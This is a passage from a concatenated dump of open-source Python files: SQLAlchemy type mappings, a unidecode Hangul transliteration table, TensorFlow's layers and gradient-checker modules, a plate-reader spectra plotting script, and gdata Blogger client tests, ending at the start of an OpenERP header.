BOOLEANTYPE = Boolean()
STRINGTYPE = String()
INTEGERTYPE = Integer()
_type_map = {
int: Integer(),
float: Numeric(),
bool: BOOLEANTYPE,
decimal.Decimal: Numeric(),
dt.date: Date(),
dt.datetime: DateTime(),
dt.time: Time(),
dt.timedelta: Interval(),
util.NoneType: NULLTYPE
}
if util.py3k:
_type_map[bytes] = LargeBinary()
_type_map[str] = Unicode()
else:
_type_map[unicode] = Unicode()
_type_map[str] = String()
# back-assign to type_api
from . import type_api
type_api.BOOLEANTYPE = BOOLEANTYPE
type_api.STRINGTYPE = STRINGTYPE
type_api.INTEGERTYPE = INTEGERTYPE
type_api.NULLTYPE = NULLTYPE
type_api._type_map = _type_map
# this one, there's all kinds of ways to play it, but at the EOD
# there's just a giant dependency cycle between the typing system and
# the expression element system, as you might expect. We can use
# importlaters or whatnot, but the typing system just necessarily has
# to have some kind of connection like this. right now we're injecting the
# _DefaultColumnComparator implementation into the TypeEngine.Comparator interface.
# Alternatively TypeEngine.Comparator could have an "impl" injected, though
# just injecting the base is simpler, error free, and more performant.
class Comparator(_DefaultColumnComparator):
BOOLEANTYPE = BOOLEANTYPE
TypeEngine.Comparator.__bases__ = (Comparator, ) + TypeEngine.Comparator.__bases__
| mit |
menardorama/ReadyNAS-Add-ons | headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x0c5.py | 253 | 4581 | data = (
'sseum', # 0x00
'sseub', # 0x01
'sseubs', # 0x02
'sseus', # 0x03
'sseuss', # 0x04
'sseung', # 0x05
'sseuj', # 0x06
'sseuc', # 0x07
'sseuk', # 0x08
'sseut', # 0x09
'sseup', # 0x0a
'sseuh', # 0x0b
'ssyi', # 0x0c
'ssyig', # 0x0d
'ssyigg', # 0x0e
'ssyigs', # 0x0f
'ssyin', # 0x10
'ssyinj', # 0x11
'ssyinh', # 0x12
'ssyid', # 0x13
'ssyil', # 0x14
'ssyilg', # 0x15
'ssyilm', # 0x16
'ssyilb', # 0x17
'ssyils', # 0x18
'ssyilt', # 0x19
'ssyilp', # 0x1a
'ssyilh', # 0x1b
'ssyim', # 0x1c
'ssyib', # 0x1d
'ssyibs', # 0x1e
'ssyis', # 0x1f
'ssyiss', # 0x20
'ssying', # 0x21
'ssyij', # 0x22
'ssyic', # 0x23
'ssyik', # 0x24
'ssyit', # 0x25
'ssyip', # 0x26
'ssyih', # 0x27
'ssi', # 0x28
'ssig', # 0x29
'ssigg', # 0x2a
'ssigs', # 0x2b
'ssin', # 0x2c
'ssinj', # 0x2d
'ssinh', # 0x2e
'ssid', # 0x2f
'ssil', # 0x30
'ssilg', # 0x31
'ssilm', # 0x32
'ssilb', # 0x33
'ssils', # 0x34
'ssilt', # 0x35
'ssilp', # 0x36
'ssilh', # 0x37
'ssim', # 0x38
'ssib', # 0x39
'ssibs', # 0x3a
'ssis', # 0x3b
'ssiss', # 0x3c
'ssing', # 0x3d
'ssij', # 0x3e
'ssic', # 0x3f
'ssik', # 0x40
'ssit', # 0x41
'ssip', # 0x42
'ssih', # 0x43
'a', # 0x44
'ag', # 0x45
'agg', # 0x46
'ags', # 0x47
'an', # 0x48
'anj', # 0x49
'anh', # 0x4a
'ad', # 0x4b
'al', # 0x4c
'alg', # 0x4d
'alm', # 0x4e
'alb', # 0x4f
'als', # 0x50
'alt', # 0x51
'alp', # 0x52
'alh', # 0x53
'am', # 0x54
'ab', # 0x55
'abs', # 0x56
'as', # 0x57
'ass', # 0x58
'ang', # 0x59
'aj', # 0x5a
'ac', # 0x5b
'ak', # 0x5c
'at', # 0x5d
'ap', # 0x5e
'ah', # 0x5f
'ae', # 0x60
'aeg', # 0x61
'aegg', # 0x62
'aegs', # 0x63
'aen', # 0x64
'aenj', # 0x65
'aenh', # 0x66
'aed', # 0x67
'ael', # 0x68
'aelg', # 0x69
'aelm', # 0x6a
'aelb', # 0x6b
'aels', # 0x6c
'aelt', # 0x6d
'aelp', # 0x6e
'aelh', # 0x6f
'aem', # 0x70
'aeb', # 0x71
'aebs', # 0x72
'aes', # 0x73
'aess', # 0x74
'aeng', # 0x75
'aej', # 0x76
'aec', # 0x77
'aek', # 0x78
'aet', # 0x79
'aep', # 0x7a
'aeh', # 0x7b
'ya', # 0x7c
'yag', # 0x7d
'yagg', # 0x7e
'yags', # 0x7f
'yan', # 0x80
'yanj', # 0x81
'yanh', # 0x82
'yad', # 0x83
'yal', # 0x84
'yalg', # 0x85
'yalm', # 0x86
'yalb', # 0x87
'yals', # 0x88
'yalt', # 0x89
'yalp', # 0x8a
'yalh', # 0x8b
'yam', # 0x8c
'yab', # 0x8d
'yabs', # 0x8e
'yas', # 0x8f
'yass', # 0x90
'yang', # 0x91
'yaj', # 0x92
'yac', # 0x93
'yak', # 0x94
'yat', # 0x95
'yap', # 0x96
'yah', # 0x97
'yae', # 0x98
'yaeg', # 0x99
'yaegg', # 0x9a
'yaegs', # 0x9b
'yaen', # 0x9c
'yaenj', # 0x9d
'yaenh', # 0x9e
'yaed', # 0x9f
'yael', # 0xa0
'yaelg', # 0xa1
'yaelm', # 0xa2
'yaelb', # 0xa3
'yaels', # 0xa4
'yaelt', # 0xa5
'yaelp', # 0xa6
'yaelh', # 0xa7
'yaem', # 0xa8
'yaeb', # 0xa9
'yaebs', # 0xaa
'yaes', # 0xab
'yaess', # 0xac
'yaeng', # 0xad
'yaej', # 0xae
'yaec', # 0xaf
'yaek', # 0xb0
'yaet', # 0xb1
'yaep', # 0xb2
'yaeh', # 0xb3
'eo', # 0xb4
'eog', # 0xb5
'eogg', # 0xb6
'eogs', # 0xb7
'eon', # 0xb8
'eonj', # 0xb9
'eonh', # 0xba
'eod', # 0xbb
'eol', # 0xbc
'eolg', # 0xbd
'eolm', # 0xbe
'eolb', # 0xbf
'eols', # 0xc0
'eolt', # 0xc1
'eolp', # 0xc2
'eolh', # 0xc3
'eom', # 0xc4
'eob', # 0xc5
'eobs', # 0xc6
'eos', # 0xc7
'eoss', # 0xc8
'eong', # 0xc9
'eoj', # 0xca
'eoc', # 0xcb
'eok', # 0xcc
'eot', # 0xcd
'eop', # 0xce
'eoh', # 0xcf
'e', # 0xd0
'eg', # 0xd1
'egg', # 0xd2
'egs', # 0xd3
'en', # 0xd4
'enj', # 0xd5
'enh', # 0xd6
'ed', # 0xd7
'el', # 0xd8
'elg', # 0xd9
'elm', # 0xda
'elb', # 0xdb
'els', # 0xdc
'elt', # 0xdd
'elp', # 0xde
'elh', # 0xdf
'em', # 0xe0
'eb', # 0xe1
'ebs', # 0xe2
'es', # 0xe3
'ess', # 0xe4
'eng', # 0xe5
'ej', # 0xe6
'ec', # 0xe7
'ek', # 0xe8
'et', # 0xe9
'ep', # 0xea
'eh', # 0xeb
'yeo', # 0xec
'yeog', # 0xed
'yeogg', # 0xee
'yeogs', # 0xef
'yeon', # 0xf0
'yeonj', # 0xf1
'yeonh', # 0xf2
'yeod', # 0xf3
'yeol', # 0xf4
'yeolg', # 0xf5
'yeolm', # 0xf6
'yeolb', # 0xf7
'yeols', # 0xf8
'yeolt', # 0xf9
'yeolp', # 0xfa
'yeolh', # 0xfb
'yeom', # 0xfc
'yeob', # 0xfd
'yeobs', # 0xfe
'yeos', # 0xff
)
| gpl-2.0 |
JVillella/tensorflow | tensorflow/python/layers/layers.py | 41 | 2376 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""This library provides a set of high-level neural networks layers.
@@dense
@@dropout
@@conv1d
@@conv2d
@@conv3d
@@separable_conv2d
@@conv2d_transpose
@@conv3d_transpose
@@average_pooling1d
@@max_pooling1d
@@average_pooling2d
@@max_pooling2d
@@average_pooling3d
@@max_pooling3d
@@batch_normalization
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util.all_util import remove_undocumented
# pylint: disable=g-bad-import-order,unused-import
# Core layers.
from tensorflow.python.layers.core import dense
from tensorflow.python.layers.core import dropout
# Convolutional layers.
from tensorflow.python.layers.convolutional import conv1d
from tensorflow.python.layers.convolutional import conv2d
from tensorflow.python.layers.convolutional import conv3d
from tensorflow.python.layers.convolutional import separable_conv2d
from tensorflow.python.layers.convolutional import conv2d_transpose
from tensorflow.python.layers.convolutional import conv3d_transpose
# Pooling layers.
from tensorflow.python.layers.pooling import average_pooling1d
from tensorflow.python.layers.pooling import max_pooling1d
from tensorflow.python.layers.pooling import average_pooling2d
from tensorflow.python.layers.pooling import max_pooling2d
from tensorflow.python.layers.pooling import average_pooling3d
from tensorflow.python.layers.pooling import max_pooling3d
# Normalization layers.
from tensorflow.python.layers.normalization import batch_normalization
# pylint: enable=g-bad-import-order,unused-import
_allowed_symbols = []
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 |
sonyahanson/assaytools | examples/ipynbs/data-analysis/spectra/2015-12-18/xml2png4scans-spectra.py | 8 | 5636 | # This script takes xml data file output from the Tecan Infinite m1000 Pro plate reader
# and makes quick and dirty images of the raw data.
# But with scans and not just singlet reads.
# This script specifically combines four spectrum scripts (AB, CD, EF, GH) into a single dataframe and plot.
# The same procedure can be used to make matrices suitable for analysis using
# matrix = dataframe.values
# Made by Sonya Hanson, with some help from things that worked in xml2png.py and xml2png4scans.py
# Friday, November 18, 2015
# Usage: python xml2png4scans-spectra.py *.xml
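# For example (file names illustrative): "python xml2png4scans-spectra.py plate1.xml"
# writes one image per data section found in plate1.xml, named like
# plate1_<section name>.png (see the plt.savefig call at the bottom of this script).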
############ For future to combine with xml2png.py
#
# for i, sect in enumerate(Sections):
# reads = sect.xpath("*/Well")
# parameters = root.xpath(path)[0]
# if reads[0].attrib['Type'] == "Scan":
#
##############
import matplotlib.pyplot as plt
from lxml import etree
import pandas as pd
import matplotlib.cm as cm
import seaborn
import sys
import os
### Define xml files.
xml_files = sys.argv[1:]
so_many = len(xml_files)
print "****This script is about to make png files for %s xml files. ****" % so_many
### Define extract function that extracts parameters
def extract(taglist):
result = []
for p in taglist:
print "Attempting to extract tag '%s'..." % p
try:
param = parameters.xpath("*[@Name='" + p + "']")[0]
result.append( p + '=' + param.attrib['Value'])
except:
### tag not found
result.append(None)
return result
### Define an initial set of dataframes, one per each section
large_dataframe0 = pd.DataFrame()
large_dataframe1 = pd.DataFrame()
large_dataframe2 = pd.DataFrame()
for file in xml_files:
### Parse XML file.
root = etree.parse(file)
### Remove extension from xml filename.
file_name = os.path.splitext(file)[0]
### Extract plate type and barcode.
plate = root.xpath("/*/Header/Parameters/Parameter[@Name='Plate']")[0]
plate_type = plate.attrib['Value']
try:
bar = root.xpath("/*/Plate/BC")[0]
barcode = bar.text
except:
barcode = 'no barcode'
### Define Sections.
Sections = root.xpath("/*/Section")
much = len(Sections)
print "****The xml file " + file + " has %s data sections:****" % much
for sect in Sections:
print sect.attrib['Name']
for i, sect in enumerate(Sections):
### Extract Parameters for this section.
path = "/*/Section[@Name='" + sect.attrib['Name'] + "']/Parameters"
parameters = root.xpath(path)[0]
### Parameters are extracted slightly differently depending on Absorbance or Fluorescence read.
        # Attach these to title0, title1, or title2, depending on the section; these will be the same for all 4 files.
if parameters[0].attrib['Value'] == "Absorbance":
result = extract(["Mode", "Wavelength Start", "Wavelength End", "Wavelength Step Size"])
globals()["title"+str(i)] = '%s, %s, %s, %s' % tuple(result)
else:
result = extract(["Gain", "Excitation Wavelength", "Emission Wavelength", "Part of Plate", "Mode"])
globals()["title"+str(i)] = '%s, %s, %s, \n %s, %s' % tuple(result)
print "****The %sth section has the parameters:****" %i
print globals()["title"+str(i)]
### Extract Reads for this section.
Sections = root.xpath("/*/Section")
reads = root.xpath("/*/Section[@Name='" + sect.attrib['Name'] + "']/*/Well")
wellIDs = [read.attrib['Pos'] for read in reads]
data = [(s.text, float(s.attrib['WL']), r.attrib['Pos'])
for r in reads
for s in r]
dataframe = pd.DataFrame(data, columns=['fluorescence','wavelength (nm)','Well'])
### dataframe_rep replaces 'OVER' (when fluorescence signal maxes out) with '3289277', an arbitrarily high number
dataframe_rep = dataframe.replace({'OVER':'3289277'})
dataframe_rep[['fluorescence']] = dataframe_rep[['fluorescence']].astype('float')
        ### Create large_dataframe0, large_dataframe1, and large_dataframe2 that collect data for each section
        ### as we cycle through sections and files.
globals()["dataframe_pivot"+str(i)] = pd.pivot_table(dataframe_rep, index = 'wavelength (nm)', columns= ['Well'])
print 'The max fluorescence value in this dataframe is %s'% globals()["dataframe_pivot"+str(i)].values.max()
globals()["large_dataframe"+str(i)] = pd.concat([globals()["large_dataframe"+str(i)],globals()["dataframe_pivot"+str(i)]])
### Plot, making a separate png for each section.
for i, sect in enumerate(Sections):
section_name = sect.attrib['Name']
path = "/*/Section[@Name='" + sect.attrib['Name'] + "']/Parameters"
parameters = root.xpath(path)[0]
if parameters[0].attrib['Value'] == "Absorbance":
section_ylim = [0,0.2]
else:
section_ylim = [0,40000]
Alphabet = ['A','B','C','D','E','F','G','H']
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(12, 12))
for j,A in enumerate(Alphabet):
for k in range(1,12):
try:
globals()["large_dataframe"+str(i)].fluorescence.get(A + str(k)).plot(ax=axes[(j/3)%3,j%3], title=A, c=cm.hsv(k*15), ylim=section_ylim, xlim=[240,800])
except:
print "****No row %s.****" %A
fig.suptitle('%s \n %s \n Barcode = %s' % (globals()["title"+str(i)], plate_type, barcode), fontsize=14)
fig.subplots_adjust(hspace=0.3)
plt.savefig('%s_%s.png' % (file_name, section_name))
| lgpl-2.1 |
MycChiu/tensorflow | tensorflow/python/ops/gradient_checker.py | 82 | 14406 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradient checker for any ops, graphs.
The gradient checker verifies numerically that an op/graph properly
computes the gradients.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients
from tensorflow.python.platform import tf_logging as logging
def _product(t):
if isinstance(t, int):
return t
else:
y = 1
for x in t:
y *= x
return y
def _extra_feeds(extra_feed_dict, new_feeds):
if not extra_feed_dict:
return new_feeds
r = {}
r.update(extra_feed_dict)
r.update(new_feeds)
return r
def _compute_theoretical_jacobian(x, x_shape, x_data, dy, dy_shape, dx,
extra_feed_dict):
"""Computes the theoretical Jacobian for dy/dx.
Computes the theoretical Jacobian using the ops generated by
compute_gradient().
Args:
x: the tensor "x".
x_shape: the dimensions of x as a tuple or an array of ints.
    x_data: a numpy array as the input data for x
dy: the tensor "dy".
dy_shape: the dimensions of dy as a tuple or an array of ints.
dx: Tensor or IndexedSlices representing dx
extra_feed_dict: dict that allows fixing specified tensor values
during the jacobian calculation.
Returns:
A 2-d numpy array representing the Jacobian for dy/dx. It has "x_size" rows
and "dy_size" columns where "x_size" is the number of elements in x and
"dy_size" is the number of elements in dy.
Raises:
ValueError: If `dy` is empty but the gradient is nonzero.
"""
# Complex vectors are treated as vectors of twice as many reals.
if x.dtype.is_complex:
x_shape = tuple(x_shape) + (2,)
dy_factor = 2 if dy.dtype.is_complex else 1
# To compute the jacobian, we treat x and y as one-dimensional vectors.
x_size = _product(x_shape)
x_val_size = _product(x_shape[1:]) # This is used for sparse gradients
dy_size = _product(dy_shape) * dy_factor
# Allocate 2-D Jacobian, with x dimensions smashed into the first
# dimension and y dimensions smashed into the second.
jacobian = np.zeros((x_size, dy_size),
dtype=x.dtype.real_dtype.as_numpy_dtype)
  # For each entry of dy, we set it to 1 and everything else to 0, then
  # compute the backprop -- this gives us one column of the Jacobian matrix.
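  # Since dx was built as gradients(y, x, dy), feeding a one-hot dy yields
  # d y[col] / d x, i.e. exactly one column of the Jacobian.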
dy_data = np.zeros(dy_shape, dtype=dy.dtype.as_numpy_dtype)
dy_data_flat = dy_data.ravel().view(dy.dtype.real_dtype.as_numpy_dtype)
sess = ops.get_default_session()
for col in range(dy_size):
dy_data_flat[col] = 1
if isinstance(dx, ops.IndexedSlices):
backprop_indices, backprop_values = sess.run(
[dx.indices, dx.values],
feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
for i, v in zip(backprop_indices, backprop_values):
r_begin = i * x_val_size
r_end = r_begin + x_val_size
jacobian[r_begin:r_end, col] += v.flat
else:
assert isinstance(dx, ops.Tensor), "dx = " + str(dx)
backprop = sess.run(
dx, feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
jacobian[:, col] = backprop.ravel().view(jacobian.dtype)
dy_data_flat[col] = 0
# If the output is empty, run the gradients at least once and make sure
# they produce zeros.
if not dy_size:
backprop = sess.run(
dx, feed_dict=_extra_feeds(extra_feed_dict, {x: x_data, dy: dy_data}))
if backprop.shape != x_data.shape:
raise ValueError("Empty gradient has wrong shape: expected %s, got %s" %
(x_data.shape, backprop.shape))
if np.any(backprop):
raise ValueError("Empty tensor with nonzero gradients")
logging.vlog(1, "Theoretical Jacobian =\n%s", jacobian)
return jacobian
def _compute_numeric_jacobian(x, x_shape, x_data, y, y_shape, delta,
extra_feed_dict):
"""Computes the numeric Jacobian for dy/dx.
Computes the numeric Jacobian by slightly perturbing the inputs and
measuring the differences on the output.
Args:
x: the tensor "x".
x_shape: the dimensions of x as a tuple or an array of ints.
x_data: a numpy array as the input data for x
y: the tensor "y".
y_shape: the dimensions of y as a tuple or an array of ints.
delta: the amount of perturbation we give to the input
extra_feed_dict: dict that allows fixing specified tensor values
during the jacobian calculation.
Returns:
A 2-d numpy array representing the Jacobian for dy/dx. It has "x_size" rows
and "y_size" columns where "x_size" is the number of elements in x and
"y_size" is the number of elements in y.
"""
# To compute the jacobian, we treat x and y as one-dimensional vectors
x_size = _product(x_shape) * (2 if x.dtype.is_complex else 1)
y_size = _product(y_shape) * (2 if y.dtype.is_complex else 1)
x_dtype = x.dtype.real_dtype.as_numpy_dtype
y_dtype = y.dtype.real_dtype.as_numpy_dtype
# Make sure we have the right types
x_data = np.asarray(x_data, dtype=x.dtype.as_numpy_dtype)
scale = np.asarray(2 * delta, dtype=y_dtype)[()]
jacobian = np.zeros((x_size, y_size), dtype=x_dtype)
  # For each entry of x, we slightly perturb it by adding and subtracting a
  # delta, then compute the difference between the outputs. This gives us one
  # row of the Jacobian matrix.
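  # This is the standard central-difference approximation:
  #   jacobian[row, :] ~= (y(x + delta * e_row) - y(x - delta * e_row)) / (2 * delta)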
for row in range(x_size):
x_pos = x_data.copy()
x_neg = x_data.copy()
x_pos.ravel().view(x_dtype)[row] += delta
y_pos = y.eval(feed_dict=_extra_feeds(extra_feed_dict, {x: x_pos}))
x_neg.ravel().view(x_dtype)[row] -= delta
y_neg = y.eval(feed_dict=_extra_feeds(extra_feed_dict, {x: x_neg}))
diff = (y_pos - y_neg) / scale
jacobian[row, :] = diff.ravel().view(y_dtype)
logging.vlog(1, "Numeric Jacobian =\n%s", jacobian)
return jacobian
def _compute_dx_and_dy(x, y, y_shape):
"""Returns a node to compute gradient of x wrt y."""
# We make up a dy so that we can compute the gradients. We don't really use
# the value of dy -- we will always feed it. We need to add an identity node
# so that we can always feed it properly. Otherwise, for the Add operation,
# dx is the same as dy and we cannot fetch the tensor that we are feeding.
with x.graph.as_default():
dy_orig = constant_op.constant(1.0, shape=y_shape, dtype=y.dtype)
dy = array_ops.identity(dy_orig)
# We compute the gradients for x wrt. y
grads = gradients.gradients(y, x, dy)
assert len(grads) == 1
return grads[0], dy_orig
def _compute_gradient(x,
x_shape,
dx,
y,
y_shape,
dy,
x_init_value=None,
delta=1e-3,
extra_feed_dict=None):
"""Computes the theoretical and numerical jacobian."""
t = dtypes.as_dtype(x.dtype)
allowed_types = [dtypes.float16, dtypes.float32, dtypes.float64,
dtypes.complex64, dtypes.complex128]
assert t.base_dtype in allowed_types, "Don't support type %s for x" % t.name
t2 = dtypes.as_dtype(y.dtype)
assert t2.base_dtype in allowed_types, "Don't support type %s for y" % t2.name
if x_init_value is not None:
i_shape = list(x_init_value.shape)
assert(list(x_shape) == i_shape), "x_shape = %s, init_data shape = %s" % (
x_shape, i_shape)
x_data = x_init_value
else:
x_data = np.random.random_sample(x_shape).astype(t.as_numpy_dtype)
if t.is_complex:
x_data.imag = np.random.random_sample(x_shape)
jacob_t = _compute_theoretical_jacobian(
x, x_shape, x_data, dy, y_shape, dx, extra_feed_dict=extra_feed_dict)
jacob_n = _compute_numeric_jacobian(
x, x_shape, x_data, y, y_shape, delta, extra_feed_dict=extra_feed_dict)
return jacob_t, jacob_n
def _compute_gradient_list(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Compute gradients for a list of x values."""
assert isinstance(x, list)
dx, dy = zip(*[_compute_dx_and_dy(xi, y, y_shape) for xi in x])
if init_targets is not None:
assert isinstance(init_targets, (list, tuple))
for init in init_targets:
init.run()
if x_init_value is None:
x_init_value = [None] * len(x)
ret = [_compute_gradient(xi, x_shapei, dxi, y, y_shape, dyi, x_init_valuei,
delta, extra_feed_dict=extra_feed_dict)
for xi, x_shapei, dxi, dyi, x_init_valuei in zip(x, x_shape, dx, dy,
x_init_value)]
return ret
def compute_gradient(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Computes and returns the theoretical and numerical Jacobian.
If `x` or `y` is complex, the Jacobian will still be real but the
corresponding Jacobian dimension(s) will be twice as large. This is required
even if both input and output is complex since TensorFlow graphs are not
necessarily holomorphic, and may have gradients not expressible as complex
numbers. For example, if `x` is complex with shape `[m]` and `y` is complex
with shape `[n]`, each Jacobian `J` will have shape `[m * 2, n * 2]` with
J[:m, :n] = d(Re y)/d(Re x)
J[:m, n:] = d(Im y)/d(Re x)
J[m:, :n] = d(Re y)/d(Im x)
J[m:, n:] = d(Im y)/d(Im x)
Args:
x: a tensor or list of tensors
x_shape: the dimensions of x as a tuple or an array of ints. If x is a list,
then this is the list of shapes.
y: a tensor
y_shape: the dimensions of y as a tuple or an array of ints.
x_init_value: (optional) a numpy array of the same shape as "x"
representing the initial value of x. If x is a list, this should be a list
of numpy arrays. If this is none, the function will pick a random tensor
as the initial value.
delta: (optional) the amount of perturbation.
init_targets: list of targets to run to initialize model params.
TODO(mrry): remove this argument.
extra_feed_dict: dict that allows fixing specified tensor values
during the Jacobian calculation.
Returns:
Two 2-d numpy arrays representing the theoretical and numerical
Jacobian for dy/dx. Each has "x_size" rows and "y_size" columns
where "x_size" is the number of elements in x and "y_size" is the
    number of elements in y. If x is a list, returns a list of such pairs of arrays.
"""
if extra_feed_dict is None:
extra_feed_dict = {}
if isinstance(x, list):
return _compute_gradient_list(x, x_shape, y, y_shape, x_init_value, delta,
init_targets, extra_feed_dict=extra_feed_dict)
else:
if init_targets is not None:
assert isinstance(init_targets, (list, tuple))
for init in init_targets:
init.run()
dx, dy = _compute_dx_and_dy(x, y, y_shape)
ret = _compute_gradient(x, x_shape, dx, y, y_shape, dy, x_init_value, delta,
extra_feed_dict=extra_feed_dict)
return ret
def compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Computes the gradient error.
Computes the maximum error for dy/dx between the computed Jacobian and the
numerically estimated Jacobian.
This function will modify the tensors passed in as it adds more operations
  and hence changes the consumers of the operations of the input tensors.
This function adds operations to the current session. To compute the error
using a particular device, such as a GPU, use the standard methods for
setting a device (e.g. using with sess.graph.device() or setting a device
function in the session constructor).
Args:
x: a tensor or list of tensors
x_shape: the dimensions of x as a tuple or an array of ints. If x is a list,
then this is the list of shapes.
y: a tensor
y_shape: the dimensions of y as a tuple or an array of ints.
x_init_value: (optional) a numpy array of the same shape as "x"
representing the initial value of x. If x is a list, this should be a list
of numpy arrays. If this is none, the function will pick a random tensor
as the initial value.
delta: (optional) the amount of perturbation.
init_targets: list of targets to run to initialize model params.
TODO(mrry): Remove this argument.
extra_feed_dict: dict that allows fixing specified tensor values
during the Jacobian calculation.
Returns:
The maximum error in between the two Jacobians.
"""
grad = compute_gradient(x, x_shape, y, y_shape, x_init_value, delta,
init_targets, extra_feed_dict=extra_feed_dict)
if isinstance(grad, tuple):
grad = [grad]
error = 0
for j_t, j_n in grad:
if j_t.size or j_n.size: # Handle zero size tensors correctly
error = np.maximum(error, np.fabs(j_t - j_n).max())
return error
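# Illustrative usage (a sketch only -- the op, shapes and tolerance below are
# placeholders, and a default session must be active, e.g. via `with
# tf.Session():` when calling through the public tf.test wrappers):
#
#   x = tf.placeholder(tf.float64, shape=[1, 3])
#   y = tf.nn.softmax(x)
#   err = compute_gradient_error(x, [1, 3], y, [1, 3])
#   assert err < 1e-4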
| apache-2.0 |
openhatch/oh-mainline | vendor/packages/gdata/tests/gdata_tests/blogger/live_client_test.py | 39 | 5831 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
# These tests attempt to connect to Google servers.
__author__ = '[email protected] (Jeff Scudder)'
import unittest
import gdata.blogger.client
import gdata.blogger.data
import gdata.gauth
import gdata.client
import atom.http_core
import atom.mock_http_core
import atom.core
import gdata.data
import gdata.test_config as conf
conf.options.register_option(conf.BLOG_ID_OPTION)
class BloggerClientTest(unittest.TestCase):
def setUp(self):
self.client = None
if conf.options.get_value('runlive') == 'true':
self.client = gdata.blogger.client.BloggerClient()
conf.configure_client(self.client, 'BloggerTest', 'blogger')
def tearDown(self):
conf.close_client(self.client)
def test_create_update_delete(self):
if not conf.options.get_value('runlive') == 'true':
return
# Either load the recording or prepare to make a live request.
conf.configure_cache(self.client, 'test_create_update_delete')
# Add a blog post.
created = self.client.add_post(conf.options.get_value('blogid'),
'test post from BloggerClientTest',
'Hey look, another test!',
labels=['test', 'python'])
self.assertEqual(created.title.text, 'test post from BloggerClientTest')
self.assertEqual(created.content.text, 'Hey look, another test!')
self.assertEqual(len(created.category), 2)
self.assert_(created.control is None)
# Change the title of the blog post we just added.
created.title.text = 'Edited'
updated = self.client.update(created)
self.assertEqual(updated.title.text, 'Edited')
self.assert_(isinstance(updated, gdata.blogger.data.BlogPost))
self.assertEqual(updated.content.text, created.content.text)
# Delete the test entry from the blog.
self.client.delete(updated)
def test_create_draft_post(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_create_draft_post')
# Add a draft blog post.
created = self.client.add_post(conf.options.get_value('blogid'),
'draft test post from BloggerClientTest',
'This should only be a draft.',
labels=['test2', 'python'], draft=True)
self.assertEqual(created.title.text,
'draft test post from BloggerClientTest')
self.assertEqual(created.content.text, 'This should only be a draft.')
self.assertEqual(len(created.category), 2)
self.assert_(created.control is not None)
self.assert_(created.control.draft is not None)
self.assertEqual(created.control.draft.text, 'yes')
# Publish the blog post.
created.control.draft.text = 'no'
updated = self.client.update(created)
if updated.control is not None and updated.control.draft is not None:
self.assertNotEqual(updated.control.draft.text, 'yes')
# Delete the test entry from the blog using the URL instead of the entry.
self.client.delete(updated.find_edit_link())
def test_create_draft_page(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_create_draft_page')
# List all pages on the blog.
pages_before = self.client.get_pages(conf.options.get_value('blogid'))
# Add a draft page to blog.
created = self.client.add_page(conf.options.get_value('blogid'),
'draft page from BloggerClientTest',
'draft content',
draft=True)
self.assertEqual(created.title.text, 'draft page from BloggerClientTest')
self.assertEqual(created.content.text, 'draft content')
self.assert_(created.control is not None)
self.assert_(created.control.draft is not None)
self.assertEqual(created.control.draft.text, 'yes')
self.assertEqual(str(int(created.get_page_id())), created.get_page_id())
# List all pages after adding one.
pages_after = self.client.get_pages(conf.options.get_value('blogid'))
self.assertEqual(len(pages_before.entry) + 1, len(pages_after.entry))
# Publish page.
created.control.draft.text = 'no'
updated = self.client.update(created)
if updated.control is not None and updated.control.draft is not None:
self.assertNotEqual(updated.control.draft.text, 'yes')
# Delete test page.
self.client.delete(updated.find_edit_link())
pages_after = self.client.get_pages(conf.options.get_value('blogid'))
self.assertEqual(len(pages_before.entry), len(pages_after.entry))
def test_retrieve_post_with_categories(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_retrieve_post_with_categories')
query = gdata.blogger.client.Query(categories=["news"], strict=True)
posts = self.client.get_posts(conf.options.get_value('blogid'), query=query)
def suite():
return conf.build_suite([BloggerClientTest])
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
| agpl-3.0 |
crmccreary/openerp_server | openerp/addons/sale/report/__init__.py | 10 | 1082 | # -*- coding: utf-8 -*-
##############################################################################
#
